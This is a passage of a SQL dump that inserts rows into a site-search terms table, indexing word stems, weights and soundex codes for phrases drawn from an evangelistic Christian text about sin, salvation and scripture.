(320673, 'another human', 'anoth human', 0, 1, 1.4333, 'A5365', 1, '*'),
(320674, 'another human being', 'anoth human being', 0, 1, 1.6333, 'A5365152', 1, '*'),
(320675, 'answer as', 'answer as', 0, 1, 1.3, 'A5262', 1, '*'),
(320676, 'answer as much', 'answer as much', 0, 1, 1.4667, 'A526252', 1, '*'),
(320677, 'answer on', 'answer on', 0, 1, 1.3, 'A5265', 1, '*'),
(320678, 'answer on this', 'answer on this', 0, 1, 1.4667, 'A526532', 1, '*'),
(320679, 'answer this', 'answer this', 0, 1, 1.3667, 'A52632', 1, '*'),
(320680, 'answer this singular', 'answer this singular', 0, 1, 1.6667, 'A526325246', 1, '*'),
(320681, 'answering', 'answer', 0, 0, 0.6, 'A52652', 1, '*'),
(320682, 'answering \'yes\'', 'answer yes', 0, 1, 1.5, 'A52652', 1, '*'),
(320683, 'answering \'yes\' to', 'answer yes to', 0, 1, 1.6, 'A526523', 1, '*'),
(320684, 'any man be', 'ani man be', 0, 1, 1.3333, 'A510', 1, '*'),
(320685, 'anyone have', 'anyon have', 0, 1, 1.3667, 'A510', 1, '*'),
(320686, 'anyone have you', 'anyon have you', 0, 1, 1.5, 'A510', 1, '*'),
(320687, 'are a sinner', 'ar a sinner', 0, 1, 1.4, 'A6256', 1, '*'),
(320688, 'are all as', 'ar all as', 0, 1, 1.3333, 'A642', 1, '*'),
(320689, 'are as', 'ar as', 0, 1, 1.2, 'A620', 1, '*'),
(320690, 'are as filthy', 'ar as filthy', 0, 1, 1.4333, 'A62143', 1, '*'),
(320691, 'are become', 'ar become', 0, 1, 1.3333, 'A6125', 1, '*'),
(320692, 'are become new.”', 'ar become new.”', 0, 1, 1.5333, 'A6125', 1, '*'),
(320693, 'are good enough', 'ar good enough', 0, 1, 1.5, 'A62352', 1, '*'),
(320694, 'are passed', 'ar passed', 0, 1, 1.3333, 'A6123', 1, '*'),
(320695, 'are passed away', 'ar passed away', 0, 1, 1.5, 'A6123', 1, '*'),
(320696, 'are you full', 'ar you full', 0, 1, 1.4, 'A614', 1, '*'),
(320697, 'are you holding', 'ar you holding', 0, 1, 1.5, 'A64352', 1, '*'),
(320698, 'as an', 'as an', 0, 1, 1.1667, 'A250', 1, '*'),
(320699, 'as an unclean', 'as an unclean', 0, 1, 1.4333, 'A25245', 1, '*'),
(320700, 'as filthy', 'as filthy', 0, 1, 1.3, 'A2143', 1, '*'),
(320701, 'as filthy rags', 'as filthy rags', 0, 1, 1.4667, 'A214362', 1, '*'),
(320702, 'as much', 'as much', 0, 1, 1.2333, 'A252', 1, '*'),
(320703, 'as much as', 'as much as', 0, 1, 1.3333, 'A252', 1, '*'),
(320704, 'as my', 'as my', 0, 1, 1.1667, 'A250', 1, '*'),
(320705, 'as my personal', 'as my personal', 0, 1, 1.4667, 'A2516254', 1, '*'),
(320706, 'as the person', 'as the person', 0, 1, 1.4333, 'A231625', 1, '*'),
(320707, 'as you were', 'as you were', 0, 1, 1.3667, 'A260', 1, '*'),
(320708, 'assume you\'re', 'assum you', 0, 1, 1.4333, 'A256', 1, '*'),
(320709, 'assume you\'re saved', 'assum you saved', 0, 1, 1.6333, 'A256213', 1, '*'),
(320710, 'assumes', 'assum', 0, 0, 0.4667, 'A252', 1, '*'),
(320711, 'assumes he\'s', 'assum he', 0, 1, 1.4, 'A252', 1, '*'),
(320712, 'assumes he\'s being', 'assum he being', 0, 1, 1.6, 'A252152', 1, '*'),
(320713, 'assumes she\'s', 'assum she', 0, 1, 1.4333, 'A252', 1, '*'),
(320714, 'assumes she\'s pregnant', 'assum she pregnant', 0, 1, 1.7333, 'A25216253', 1, '*'),
(320715, 'assumption but', 'assumpt but', 0, 1, 1.4667, 'A2513513', 1, '*'),
(320716, 'assumption but reality', 'assumpt but reality', 0, 1, 1.7333, 'A2513513643', 1, '*'),
(320717, 'assumption is', 'assumpt is', 0, 1, 1.4333, 'A251352', 1, '*'),
(320718, 'assumption is the', 'assumpt is the', 0, 1, 1.5667, 'A2513523', 1, '*'),
(320719, 'attitude to sin', 'attitud to sin', 0, 1, 1.5, 'A325', 1, '*'),
(320720, 'away behold', 'awai behold', 0, 1, 1.3667, 'A143', 1, '*'),
(320721, 'away behold all', 'awai behold all', 0, 1, 1.5, 'A1434', 1, '*'),
(320722, 'based on', 'base on', 0, 1, 1.2667, 'B235', 1, '*'),
(320723, 'based on your', 'base on your', 0, 1, 1.4333, 'B2356', 1, '*'),
(320724, 'be in christ', 'be in christ', 0, 1, 1.4, 'B52623', 1, '*'),
(320725, 'be irrevocably', 'be irrevocably', 0, 1, 1.4667, 'B61214', 1, '*'),
(320726, 'be irrevocably committed', 'be irrevocably committed', 0, 1, 1.8, 'B61214253', 1, '*'),
(320727, 'be saved do', 'be saved do', 0, 1, 1.3667, 'B213', 1, '*'),
(320728, 'be saved for', 'be saved for', 0, 1, 1.4, 'B21316', 1, '*'),
(320729, 'be saved realize', 'be saved realize', 0, 1, 1.5333, 'B213642', 1, '*'),
(320730, 'be saved today', 'be saved today', 0, 1, 1.4667, 'B213', 1, '*'),
(320731, 'be testified', 'be testified', 0, 1, 1.4, 'B32313', 1, '*'),
(320732, 'be testified in', 'be testified in', 0, 1, 1.5, 'B323135', 1, '*'),
(320733, 'be your personal', 'be your personal', 0, 1, 1.5333, 'B616254', 1, '*'),
(320734, 'because of one', 'becaus of one', 0, 1, 1.4667, 'B215', 1, '*'),
(320735, 'become new.”', 'becom new.”', 0, 1, 1.4, 'B250', 1, '*'),
(320736, 'become new.” ii', 'becom new.” ii', 0, 1, 1.5, 'B250', 1, '*'),
(320737, 'behold all', 'behold all', 0, 1, 1.3333, 'B434', 1, '*'),
(320738, 'behold all things', 'behold all things', 0, 1, 1.5667, 'B434352', 1, '*'),
(320739, 'being admitted', 'be admitted', 0, 1, 1.4667, 'B52353', 1, '*'),
(320740, 'being admitted into', 'be admitted into', 0, 1, 1.6333, 'B5235353', 1, '*'),
(320741, 'being are', 'be are', 0, 1, 1.3, 'B526', 1, '*'),
(320742, 'being are you', 'be are you', 0, 1, 1.4333, 'B526', 1, '*'),
(320743, 'being the', 'be the', 0, 1, 1.3, 'B523', 1, '*'),
(320744, 'being the saviour', 'be the saviour', 0, 1, 1.5667, 'B523216', 1, '*'),
(320745, 'believe in the', 'believ in the', 0, 1, 1.4667, 'B4153', 1, '*'),
(320746, 'believe in thine', 'believ in thine', 0, 1, 1.5333, 'B41535', 1, '*'),
(320747, 'believe the', 'believ the', 0, 1, 1.3667, 'B413', 1, '*'),
(320748, 'believe the report', 'believ the report', 0, 1, 1.6, 'B4136163', 1, '*'),
(320749, 'believe what', 'believ what', 0, 1, 1.4, 'B413', 1, '*'),
(320750, 'believe what the', 'believ what the', 0, 1, 1.5333, 'B413', 1, '*'),
(320751, 'believe with', 'believ with', 0, 1, 1.4, 'B413', 1, '*'),
(320752, 'believe with my', 'believ with my', 0, 1, 1.5, 'B4135', 1, '*'),
(320753, 'believe you are', 'believ you are', 0, 1, 1.5, 'B416', 1, '*'),
(320754, 'believeth', 'believeth', 0, 0, 0.6, 'B413', 1, '*'),
(320755, 'believeth unto', 'believeth unto', 0, 1, 1.4667, 'B41353', 1, '*'),
(320756, 'believeth unto righteousness', 'believeth unto righteousness', 0, 1, 1.9333, 'B41353623252', 1, '*'),
(320757, 'beloved answering', 'belov answering', 0, 1, 1.5667, 'B41352652', 1, '*'),
(320758, 'beloved answering \'yes\'', 'belov answering yes', 0, 1, 1.7667, 'B41352652', 1, '*'),
(320759, 'best not', 'best not', 0, 1, 1.2667, 'B2353', 1, '*'),
(320760, 'best not to', 'best not to', 0, 1, 1.3667, 'B2353', 1, '*'),
(320761, 'bible said about', 'bibl said about', 0, 1, 1.5333, 'B42313', 1, '*'),
(320762, 'bible says all', 'bibl says all', 0, 1, 1.4667, 'B424', 1, '*'),
(320763, 'black learned', 'black learned', 0, 1, 1.4333, 'B424653', 1, '*'),
(320764, 'black learned and', 'black learned and', 0, 1, 1.5667, 'B42465353', 1, '*'),
(320765, 'blood and', 'blood and', 0, 1, 1.3, 'B4353', 1, '*'),
(320766, 'blood and make', 'blood and make', 0, 1, 1.4667, 'B435352', 1, '*'),
(320767, 'blood that', 'blood that', 0, 1, 1.3333, 'B430', 1, '*'),
(320768, 'blood that i', 'blood that i', 0, 1, 1.4, 'B430', 1, '*'),
(320769, 'born again church', 'born again church', 0, 1, 1.5667, 'B6525262', 1, '*'),
(320770, 'born again friends', 'born again friends', 0, 1, 1.6, 'B652516532', 1, '*'),
(320771, 'born and', 'born and', 0, 1, 1.2667, 'B653', 1, '*'),
(320772, 'born and bred', 'born and bred', 0, 1, 1.4333, 'B653163', 1, '*'),
(320773, 'bred', 'bred', 0, 0, 0.2667, 'B630', 1, '*'),
(320774, 'bred do', 'bred do', 0, 1, 1.2333, 'B630', 1, '*'),
(320775, 'bred do you', 'bred do you', 0, 1, 1.3667, 'B630', 1, '*'),
(320776, 'but jesus', 'but jesus', 0, 1, 1.3, 'B320', 1, '*'),
(320777, 'but jesus died', 'but jesus died', 0, 1, 1.4667, 'B323', 1, '*'),
(320778, 'but reality', 'but reality', 0, 1, 1.3667, 'B3643', 1, '*'),
(320779, 'but reality no', 'but reality no', 0, 1, 1.4667, 'B36435', 1, '*'),
(320780, 'but with', 'but with', 0, 1, 1.2667, 'B300', 1, '*'),
(320781, 'but with no', 'but with no', 0, 1, 1.3667, 'B350', 1, '*'),
(320782, 'came into', 'came into', 0, 1, 1.3, 'C530', 1, '*'),
(320783, 'came into the', 'came into the', 0, 1, 1.4333, 'C530', 1, '*'),
(320784, 'can answer', 'can answer', 0, 1, 1.3333, 'C526', 1, '*'),
(320785, 'can answer as', 'can answer as', 0, 1, 1.4333, 'C5262', 1, '*'),
(320786, 'can be your', 'can be your', 0, 1, 1.3667, 'C516', 1, '*'),
(320787, 'can you', 'can you', 0, 1, 1.2333, 'C500', 1, '*'),
(320788, 'can you be', 'can you be', 0, 1, 1.3333, 'C510', 1, '*'),
(320789, 'cannot assume', 'cannot assume', 0, 1, 1.4333, 'C5325', 1, '*'),
(320790, 'cannot assume you\'re', 'cannot assume you', 0, 1, 1.6667, 'C53256', 1, '*'),
(320791, 'cannot save', 'cannot save', 0, 1, 1.3667, 'C5321', 1, '*'),
(320792, 'cannot save myself', 'cannot save myself', 0, 1, 1.6, 'C53215241', 1, '*'),
(320793, 'cannot save you', 'cannot save you', 0, 1, 1.5, 'C5321', 1, '*'),
(320794, 'changed life', 'chang life', 0, 1, 1.4, 'C52341', 1, '*'),
(320795, 'changed life and', 'chang life and', 0, 1, 1.5333, 'C5234153', 1, '*'),
(320796, 'check it', 'check it', 0, 1, 1.2667, 'C300', 1, '*'),
(320797, 'check it out', 'check it out', 0, 1, 1.4, 'C300', 1, '*'),
(320798, 'chief', 'chief', 0, 0, 0.3333, 'C100', 1, '*'),
(320799, 'chief 1', 'chief 1', 0, 1, 1.2333, 'C100', 1, '*'),
(320800, 'chief 1 tim', 'chief 1 tim', 0, 1, 1.3667, 'C135', 1, '*'),
(320801, 'christ he', 'christ he', 0, 1, 1.3, 'C623', 1, '*'),
(320802, 'christ he is', 'christ he is', 0, 1, 1.4, 'C6232', 1, '*'),
(320803, 'christ into', 'christ into', 0, 1, 1.3667, 'C62353', 1, '*'),
(320804, 'christ into your', 'christ into your', 0, 1, 1.5333, 'C623536', 1, '*'),
(320805, 'christ jesus came', 'christ jesus came', 0, 1, 1.5667, 'C62325', 1, '*'),
(320806, 'christ jesus who', 'christ jesus who', 0, 1, 1.5333, 'C6232', 1, '*'),
(320807, 'church do you', 'church do you', 0, 1, 1.4333, 'C623', 1, '*'),
(320808, 'churches men', 'church men', 0, 1, 1.4, 'C625', 1, '*'),
(320809, 'churches men of', 'church men of', 0, 1, 1.5, 'C6251', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(320810, 'come short', 'come short', 0, 1, 1.3333, 'C5263', 1, '*'),
(320811, 'come short of', 'come short of', 0, 1, 1.4333, 'C52631', 1, '*'),
(320812, 'come “short', 'come “short', 0, 1, 1.3667, 'C5263', 1, '*'),
(320813, 'come “short of', 'come “short of', 0, 1, 1.4667, 'C52631', 1, '*'),
(320814, 'comes to critical', 'come to critical', 0, 1, 1.5667, 'C52326324', 1, '*'),
(320815, 'committed to following', 'commit to following', 0, 1, 1.7333, 'C531452', 1, '*'),
(320816, 'confer', 'confer', 0, 0, 0.4, 'C516', 1, '*'),
(320817, 'confer salvation', 'confer salvation', 0, 1, 1.5333, 'C51624135', 1, '*'),
(320818, 'confer salvation on', 'confer salvation on', 0, 1, 1.6333, 'C51624135', 1, '*'),
(320819, 'confess with', 'confess with', 0, 1, 1.4, 'C5123', 1, '*'),
(320820, 'confess with my', 'confess with my', 0, 1, 1.5, 'C51235', 1, '*'),
(320821, 'confess with thy', 'confess with thy', 0, 1, 1.5333, 'C5123', 1, '*'),
(320822, 'confession is', 'confess is', 0, 1, 1.4333, 'C51252', 1, '*'),
(320823, 'confession is made', 'confess is made', 0, 1, 1.6, 'C5125253', 1, '*'),
(320824, 'confirm', 'confirm', 0, 0, 0.4667, 'C5165', 1, '*'),
(320825, 'confirm and', 'confirm and', 0, 1, 1.3667, 'C51653', 1, '*'),
(320826, 'confirm and check', 'confirm and check', 0, 1, 1.5667, 'C516532', 1, '*'),
(320827, 'cor 5', 'cor 5', 0, 1, 1.1667, 'C600', 1, '*'),
(320828, 'cor 5 17', 'cor 5 17', 0, 1, 1.2667, 'C600', 1, '*'),
(320829, 'creature old', 'creatur old', 0, 1, 1.4, 'C63643', 1, '*'),
(320830, 'creature old things', 'creatur old things', 0, 1, 1.6333, 'C6364352', 1, '*'),
(320831, 'credible', 'credibl', 0, 0, 0.5333, 'C6314', 1, '*'),
(320832, 'credible evidence', 'credibl evidence', 0, 1, 1.5667, 'C63141352', 1, '*'),
(320833, 'credible evidence of', 'credibl evidence of', 0, 1, 1.6667, 'C631413521', 1, '*'),
(320834, 'critical things', 'critic things', 0, 1, 1.5, 'C6324352', 1, '*'),
(320835, 'critical things of', 'critic things of', 0, 1, 1.6, 'C63243521', 1, '*'),
(320836, 'cross died', 'cross died', 0, 1, 1.3333, 'C623', 1, '*'),
(320837, 'cross died for', 'cross died for', 0, 1, 1.4667, 'C62316', 1, '*'),
(320838, 'dead thou', 'dead thou', 0, 1, 1.3, 'D000', 1, '*'),
(320839, 'dead thou shalt', 'dead thou shalt', 0, 1, 1.5, 'D243', 1, '*'),
(320840, 'decision to', 'decis to', 0, 1, 1.3667, 'D253', 1, '*'),
(320841, 'decision to turn', 'decis to turn', 0, 1, 1.5333, 'D25365', 1, '*'),
(320842, 'deed', 'deed', 0, 0, 0.2667, 'D000', 1, '*'),
(320843, 'deed and', 'deed and', 0, 1, 1.2667, 'D530', 1, '*'),
(320844, 'deed and doing', 'deed and doing', 0, 1, 1.4667, 'D5352', 1, '*'),
(320845, 'devil the world', 'devil the world', 0, 1, 1.5, 'D143643', 1, '*'),
(320846, 'did on', 'did on', 0, 1, 1.2, 'D500', 1, '*'),
(320847, 'did on the', 'did on the', 0, 1, 1.3333, 'D530', 1, '*'),
(320848, 'died for', 'di for', 0, 1, 1.2667, 'D160', 1, '*'),
(320849, 'died for me', 'di for me', 0, 1, 1.3667, 'D165', 1, '*'),
(320850, 'died for your', 'di for your', 0, 1, 1.4333, 'D160', 1, '*'),
(320851, 'do lord', 'do lord', 0, 1, 1.2333, 'D463', 1, '*'),
(320852, 'do lord acts', 'do lord acts', 0, 1, 1.4, 'D463232', 1, '*'),
(320853, 'do these things', 'do these things', 0, 1, 1.5, 'D2352', 1, '*'),
(320854, 'do you believe', 'do you believe', 0, 1, 1.4667, 'D141', 1, '*'),
(320855, 'do you even', 'do you even', 0, 1, 1.3667, 'D150', 1, '*'),
(320856, 'do you give', 'do you give', 0, 1, 1.3667, 'D210', 1, '*'),
(320857, 'do you have', 'do you have', 0, 1, 1.3667, 'D100', 1, '*'),
(320858, 'do you need', 'do you need', 0, 1, 1.3667, 'D530', 1, '*'),
(320859, 'do you want', 'do you want', 0, 1, 1.3667, 'D530', 1, '*'),
(320860, 'does not confer', 'doe not confer', 0, 1, 1.5, 'D2532516', 1, '*'),
(320861, 'doing penance', 'do penance', 0, 1, 1.4333, 'D52152', 1, '*'),
(320862, 'doing penance or', 'do penance or', 0, 1, 1.5333, 'D521526', 1, '*'),
(320863, 'doing your', 'do your', 0, 1, 1.3333, 'D526', 1, '*'),
(320864, 'doing your best', 'do your best', 0, 1, 1.5, 'D526123', 1, '*'),
(320865, 'don\'t work', 'don work', 0, 1, 1.3333, 'D5362', 1, '*'),
(320866, 'don\'t work on', 'don work on', 0, 1, 1.4333, 'D53625', 1, '*'),
(320867, 'due time', 'due time', 0, 1, 1.2667, 'D500', 1, '*'),
(320868, 'due time 1', 'due time 1', 0, 1, 1.3333, 'D500', 1, '*'),
(320869, 'earth and on', 'earth and on', 0, 1, 1.4, 'E63535', 1, '*'),
(320870, 'enough as', 'enough as', 0, 1, 1.3, 'E520', 1, '*'),
(320871, 'enough as you', 'enough as you', 0, 1, 1.4333, 'E520', 1, '*'),
(320872, 'etc all', 'etc all', 0, 1, 1.2333, 'E324', 1, '*'),
(320873, 'etc all need', 'etc all need', 0, 1, 1.4, 'E32453', 1, '*'),
(320874, 'even believe', 'even believe', 0, 1, 1.4, 'E15141', 1, '*'),
(320875, 'even believe what', 'even believe what', 0, 1, 1.5667, 'E151413', 1, '*'),
(320876, 'evidence of a', 'evid of a', 0, 1, 1.4333, 'E13521', 1, '*'),
(320877, 'faithful saying', 'faith saying', 0, 1, 1.5, 'F314252', 1, '*'),
(320878, 'faithful saying and', 'faith saying and', 0, 1, 1.6333, 'F31425253', 1, '*'),
(320879, 'father i', 'father i', 0, 1, 1.2667, 'F360', 1, '*'),
(320880, 'father i come', 'father i come', 0, 1, 1.4333, 'F3625', 1, '*'),
(320881, 'father i thank', 'father i thank', 0, 1, 1.4667, 'F36352', 1, '*'),
(320882, 'female white', 'femal white', 0, 1, 1.4, 'F543', 1, '*'),
(320883, 'female white and', 'femal white and', 0, 1, 1.5333, 'F54353', 1, '*'),
(320884, 'filthy', 'filthi', 0, 0, 0.4, 'F430', 1, '*'),
(320885, 'filthy rags', 'filthi rags', 0, 1, 1.3667, 'F4362', 1, '*'),
(320886, 'filthy rags the', 'filthi rags the', 0, 1, 1.5, 'F43623', 1, '*'),
(320887, 'following jesus', 'follow jesus', 0, 1, 1.5, 'F452', 1, '*'),
(320888, 'following jesus and', 'follow jesus and', 0, 1, 1.6333, 'F45253', 1, '*'),
(320889, 'for all to', 'for all to', 0, 1, 1.3333, 'F643', 1, '*'),
(320890, 'for me he', 'for me he', 0, 1, 1.3, 'F650', 1, '*'),
(320891, 'for tests', 'for tests', 0, 1, 1.3, 'F63232', 1, '*'),
(320892, 'for tests and', 'for tests and', 0, 1, 1.4333, 'F6323253', 1, '*'),
(320893, 'for there', 'for there', 0, 1, 1.3, 'F636', 1, '*'),
(320894, 'for there is', 'for there is', 0, 1, 1.4, 'F6362', 1, '*'),
(320895, 'for with', 'for with', 0, 1, 1.2667, 'F630', 1, '*'),
(320896, 'for with the', 'for with the', 0, 1, 1.4, 'F630', 1, '*'),
(320897, 'for your sins', 'for your sins', 0, 1, 1.4333, 'F6252', 1, '*'),
(320898, 'forgive', 'forgiv', 0, 0, 0.4667, 'F621', 1, '*'),
(320899, 'forgive me', 'forgiv me', 0, 1, 1.3333, 'F6215', 1, '*'),
(320900, 'forgive me all', 'forgiv me all', 0, 1, 1.4667, 'F62154', 1, '*'),
(320901, 'form of knowledge', 'form of knowledge', 0, 1, 1.5667, 'F65125432', 1, '*'),
(320902, 'forsake the', 'forsak the', 0, 1, 1.3667, 'F623', 1, '*'),
(320903, 'forsake the devil', 'forsak the devil', 0, 1, 1.5667, 'F62314', 1, '*'),
(320904, 'friend', 'friend', 0, 0, 0.4, 'F653', 1, '*'),
(320905, 'friend assumption', 'friend assumption', 0, 1, 1.5667, 'F65325135', 1, '*'),
(320906, 'friend assumption is', 'friend assumption is', 0, 1, 1.6667, 'F653251352', 1, '*'),
(320907, 'friends are', 'friend are', 0, 1, 1.3667, 'F65326', 1, '*'),
(320908, 'friends are you', 'friend are you', 0, 1, 1.5, 'F65326', 1, '*'),
(320909, 'from sin and', 'from sin and', 0, 1, 1.4, 'F65253', 1, '*'),
(320910, 'from sin “jesus', 'from sin “jesus', 0, 1, 1.5, 'F65252', 1, '*'),
(320911, 'full of many', 'full of many', 0, 1, 1.4, 'F415', 1, '*'),
(320912, 'gave himself', 'gave himself', 0, 1, 1.4, 'G15241', 1, '*'),
(320913, 'gave himself a', 'gave himself a', 0, 1, 1.4667, 'G15241', 1, '*'),
(320914, 'genuinely', 'genuin', 0, 0, 0.6, 'G540', 1, '*'),
(320915, 'genuinely saved', 'genuin saved', 0, 1, 1.5, 'G54213', 1, '*'),
(320916, 'give money', 'give money', 0, 1, 1.3333, 'G150', 1, '*'),
(320917, 'give money to', 'give money to', 0, 1, 1.4333, 'G153', 1, '*'),
(320918, 'glory of god”', 'glori of god”', 0, 1, 1.4333, 'G46123', 1, '*'),
(320919, 'glory rom', 'glori rom', 0, 1, 1.3, 'G465', 1, '*'),
(320920, 'glory rom 3', 'glori rom 3', 0, 1, 1.3667, 'G465', 1, '*'),
(320921, 'god about', 'god about', 0, 1, 1.3, 'G313', 1, '*'),
(320922, 'god about jesus', 'god about jesus', 0, 1, 1.5, 'G3132', 1, '*'),
(320923, 'god and men', 'god and men', 0, 1, 1.3667, 'G3535', 1, '*'),
(320924, 'god and one', 'god and one', 0, 1, 1.3667, 'G3535', 1, '*'),
(320925, 'god and projects', 'god and projects', 0, 1, 1.5333, 'G35316232', 1, '*'),
(320926, 'god hath raised', 'god hath raised', 0, 1, 1.5, 'G3623', 1, '*'),
(320927, 'god john', 'god john', 0, 1, 1.2667, 'G325', 1, '*'),
(320928, 'god john 9', 'god john 9', 0, 1, 1.3333, 'G325', 1, '*'),
(320929, 'god people', 'god people', 0, 1, 1.3333, 'G314', 1, '*'),
(320930, 'god people of', 'god people of', 0, 1, 1.4333, 'G3141', 1, '*'),
(320931, 'god\'s glory rom', 'god glory rom', 0, 1, 1.5, 'G32465', 1, '*'),
(320932, 'god”', 'god”', 0, 0, 0.2667, 'G300', 1, '*'),
(320933, 'god” rom', 'god” rom', 0, 1, 1.2667, 'G365', 1, '*'),
(320934, 'god” rom 3', 'god” rom 3', 0, 1, 1.3333, 'G365', 1, '*'),
(320935, 'goes for', 'goe for', 0, 1, 1.2667, 'G160', 1, '*'),
(320936, 'goes for tests', 'goe for tests', 0, 1, 1.4667, 'G163232', 1, '*'),
(320937, 'goes to', 'goe to', 0, 1, 1.2333, 'G300', 1, '*'),
(320938, 'goes to confirm', 'goe to confirm', 0, 1, 1.5, 'G325165', 1, '*'),
(320939, 'good deed', 'good deed', 0, 1, 1.3, 'G300', 1, '*'),
(320940, 'good deed and', 'good deed and', 0, 1, 1.4333, 'G353', 1, '*'),
(320941, 'good enough', 'good enough', 0, 1, 1.3667, 'G352', 1, '*'),
(320942, 'good enough as', 'good enough as', 0, 1, 1.4667, 'G352', 1, '*'),
(320943, 'good news of', 'good news of', 0, 1, 1.4, 'G3521', 1, '*'),
(320944, 'good resolutions', 'good resolutions', 0, 1, 1.5333, 'G3624352', 1, '*'),
(320945, 'good resolutions to', 'good resolutions to', 0, 1, 1.6333, 'G36243523', 1, '*'),
(320946, 'good works have', 'good works have', 0, 1, 1.5, 'G3621', 1, '*'),
(320947, 'gospel good', 'gospel good', 0, 1, 1.3667, 'G1423', 1, '*'),
(320948, 'gospel good news', 'gospel good news', 0, 1, 1.5333, 'G142352', 1, '*'),
(320949, 'gospel the', 'gospel the', 0, 1, 1.3333, 'G143', 1, '*'),
(320950, 'gospel the sinfulness', 'gospel the sinfulness', 0, 1, 1.7, 'G143251452', 1, '*'),
(320951, 'habits i', 'habit i', 0, 1, 1.2667, 'H132', 1, '*'),
(320952, 'habits i believe', 'habit i believe', 0, 1, 1.5333, 'H132141', 1, '*'),
(320953, 'harm', 'harm', 0, 0, 0.2667, 'H650', 1, '*'),
(320954, 'harm another', 'harm another', 0, 1, 1.4, 'H6536', 1, '*'),
(320955, 'harm another human', 'harm another human', 0, 1, 1.6, 'H65365', 1, '*'),
(320956, 'hath raised', 'hath raised', 0, 1, 1.3667, 'H3623', 1, '*'),
(320957, 'hath raised him', 'hath raised him', 0, 1, 1.5, 'H36235', 1, '*'),
(320958, 'have a credible', 'have a credible', 0, 1, 1.5, 'H126314', 1, '*'),
(320959, 'have come short', 'have come short', 0, 1, 1.5, 'H125263', 1, '*'),
(320960, 'have me', 'have me', 0, 1, 1.2333, 'H150', 1, '*'),
(320961, 'have me to', 'have me to', 0, 1, 1.3333, 'H153', 1, '*'),
(320962, 'have saved', 'have saved', 0, 1, 1.3333, 'H1213', 1, '*'),
(320963, 'have saved me', 'have saved me', 0, 1, 1.4333, 'H12135', 1, '*'),
(320964, 'have sinned', 'have sinned', 0, 1, 1.3667, 'H1253', 1, '*'),
(320965, 'have sinned and', 'have sinned and', 0, 1, 1.5, 'H125353', 1, '*'),
(320966, 'have you just', 'have you just', 0, 1, 1.4333, 'H123', 1, '*'),
(320967, 'he goes to', 'he goes to', 0, 1, 1.3333, 'H230', 1, '*'),
(320968, 'he shed', 'he shed', 0, 1, 1.2333, 'H230', 1, '*'),
(320969, 'he shed his', 'he shed his', 0, 1, 1.3667, 'H232', 1, '*'),
(320970, 'he\'s being', 'he being', 0, 1, 1.3333, 'H2152', 1, '*'),
(320971, 'he\'s being admitted', 'he being admitted', 0, 1, 1.6333, 'H2152353', 1, '*'),
(320972, 'heart and confess', 'heart and confess', 0, 1, 1.5667, 'H63532512', 1, '*'),
(320973, 'heart man', 'heart man', 0, 1, 1.3, 'H635', 1, '*'),
(320974, 'heart man believeth', 'heart man believeth', 0, 1, 1.6333, 'H6351413', 1, '*'),
(320975, 'heart now', 'heart now', 0, 1, 1.3, 'H635', 1, '*'),
(320976, 'heart now pray', 'heart now pray', 0, 1, 1.4667, 'H63516', 1, '*'),
(320977, 'heart that god', 'heart that god', 0, 1, 1.4667, 'H6323', 1, '*'),
(320978, 'higher institution', 'higher institution', 0, 1, 1.6, 'H265235', 1, '*'),
(320979, 'higher institution he', 'higher institution he', 0, 1, 1.7, 'H265235', 1, '*'),
(320980, 'him do', 'him do', 0, 1, 1.2, 'H530', 1, '*'),
(320981, 'him do you', 'him do you', 0, 1, 1.3333, 'H530', 1, '*'),
(320982, 'him from', 'him from', 0, 1, 1.2667, 'H5165', 1, '*'),
(320983, 'him from the', 'him from the', 0, 1, 1.4, 'H51653', 1, '*'),
(320984, 'himself a ransom', 'himself a ransom', 0, 1, 1.5333, 'H52416525', 1, '*'),
(320985, 'his blood', 'hi blood', 0, 1, 1.3, 'H2143', 1, '*'),
(320986, 'his blood that', 'hi blood that', 0, 1, 1.4667, 'H2143', 1, '*'),
(320987, 'his will', 'hi will', 0, 1, 1.2667, 'H240', 1, '*'),
(320988, 'his will and', 'hi will and', 0, 1, 1.4, 'H2453', 1, '*'),
(320989, 'holding spiritual', 'hold spiritual', 0, 1, 1.5667, 'H43521634', 1, '*'),
(320990, 'holding spiritual titles', 'hold spiritual titles', 0, 1, 1.8, 'H43521634342', 1, '*'),
(320991, 'how can you', 'how can you', 0, 1, 1.3667, 'H250', 1, '*'),
(320992, 'human being are', 'human being are', 0, 1, 1.5, 'H51526', 1, '*'),
(320993, 'i accept', 'i accept', 0, 1, 1.2667, 'I213', 1, '*'),
(320994, 'i accept jesus', 'i accept jesus', 0, 1, 1.4667, 'I2132', 1, '*'),
(320995, 'i am chief', 'i am chief', 0, 1, 1.3333, 'I521', 1, '*'),
(320996, 'i believe with', 'i believe with', 0, 1, 1.4667, 'I1413', 1, '*'),
(320997, 'i forsake', 'i forsake', 0, 1, 1.3, 'I162', 1, '*'),
(320998, 'i forsake the', 'i forsake the', 0, 1, 1.4333, 'I1623', 1, '*'),
(320999, 'i genuinely', 'i genuinely', 0, 1, 1.3667, 'I254', 1, '*'),
(321000, 'i genuinely saved', 'i genuinely saved', 0, 1, 1.5667, 'I254213', 1, '*'),
(321001, 'i might', 'i might', 0, 1, 1.2333, 'I523', 1, '*'),
(321002, 'i might be', 'i might be', 0, 1, 1.3333, 'I5231', 1, '*'),
(321003, 'i thank', 'i thank', 0, 1, 1.2333, 'I352', 1, '*'),
(321004, 'i thank you', 'i thank you', 0, 1, 1.3667, 'I352', 1, '*'),
(321005, 'i\'m a', 'i a', 0, 1, 1.1667, 'I500', 1, '*'),
(321006, 'i\'m a sinner', 'i a sinner', 0, 1, 1.4, 'I5256', 1, '*'),
(321007, 'if any', 'if any', 0, 1, 1.2, 'I150', 1, '*'),
(321008, 'if any man', 'if any man', 0, 1, 1.3333, 'I150', 1, '*'),
(321009, 'if thou', 'if thou', 0, 1, 1.2333, 'I130', 1, '*'),
(321010, 'if thou shalt', 'if thou shalt', 0, 1, 1.4333, 'I13243', 1, '*'),
(321011, 'ii cor', 'ii cor', 0, 1, 1.2, 'I260', 1, '*'),
(321012, 'ii cor 5', 'ii cor 5', 0, 1, 1.2667, 'I260', 1, '*'),
(321013, 'illiterate', 'illiter', 0, 0, 0.6667, 'I4363', 1, '*'),
(321014, 'illiterate etc', 'illiter etc', 0, 1, 1.4667, 'I43632', 1, '*'),
(321015, 'illiterate etc all', 'illiter etc all', 0, 1, 1.6, 'I436324', 1, '*'),
(321016, 'in all issues', 'in all issues', 0, 1, 1.4333, 'I542', 1, '*'),
